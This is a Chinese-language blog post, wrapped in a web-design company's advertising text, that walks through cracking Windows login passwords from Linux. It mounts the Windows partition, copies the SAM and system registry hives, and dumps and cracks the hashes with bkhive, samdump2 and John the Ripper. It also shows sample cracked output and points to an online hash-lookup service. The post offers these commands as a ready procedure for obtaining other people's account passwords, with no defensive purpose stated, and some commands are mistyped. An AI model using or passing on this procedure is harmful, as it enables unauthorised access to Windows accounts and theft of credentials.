小編給大家分享一下Linux系統(tǒng)下如何破解SAM密碼,希望大家閱讀完這篇文章之后都有所收獲,下面讓我們一起去探討吧!
10多年專注成都網(wǎng)站制作,成都定制網(wǎng)站,個人網(wǎng)站制作服務(wù),為大家分享網(wǎng)站制作知識、方案,網(wǎng)站設(shè)計流程、步驟,成功服務(wù)上千家企業(yè)。為您提供網(wǎng)站建設(shè),網(wǎng)站制作,網(wǎng)頁設(shè)計及定制高端網(wǎng)站建設(shè)服務(wù),專注于成都定制網(wǎng)站,高端網(wǎng)頁制作,對邊坡防護網(wǎng)等多個方面,擁有多年的網(wǎng)站維護經(jīng)驗。
用linux啟動,并掛載Windows的系統(tǒng)分區(qū)把c:\windows\system32\config\目錄下的SAM和system復(fù)制出來
也可以用WINPE,DOS引導(dǎo)盤,都可以的,只要把SAM和system復(fù)制出來就行
開始破解:
bkhive system keys ——生成keys文件
samdump2 SAM keys > hashes ——用SAM和keys生成hashes
john hashes ——跑hashes
友情提示:
可以直接訪問 http://www.objectif-securite.ch/en/products.php 在線查詢hash
現(xiàn)在沒有在linux下,改天上圖,下面我文字描述一下
mount -t ntfs /dev/hda1 /mnt/windows
mkdir /home/young001/sam
cp /mnt/windows/WINDOWS\system32\config/SAM /home/young001/sam
cp /mnt/windows/WINDOWS\system32\config/system /home/young001/sam
unount /mnt/windows
cd /home/young001/sam
bkhive system keys
samdump2 SAM keys > hashes
john hashes ——跑hashes
這樣密碼揪出來了
另外加上一些提示:
比如administrator密碼是123456,那么他會在最底下這么顯示
administrator:123456:500:e263f50a6a506be3d494d3d62b4dc666:::看起來有點像/etc/passwd的內(nèi)容格式,如果當(dāng)時沒有看清楚密碼就清屏了,或者后來忘記已經(jīng)破解了的密碼,可以通過下面命令查看
john-1.7.2/run/john -show hashes有的時候密碼處有可能會顯示幾個問號,如下
administrator:???456:500:e263f50a6a506be3d494d3d62b4dc666:::這個時候可以通過
john-1.7.2/run/john -show hashes看看密碼是否完整。 如果還是不完整,那么可能密碼沒有完全破解完畢,可以加–restore 參數(shù)從原來基礎(chǔ)上繼續(xù)破解
john-1.7.2/run/john ——restore hashes
看完了這篇文章,相信你對“Linux系統(tǒng)下如何破解SAM密碼”有了一定的了解,如果想了解更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!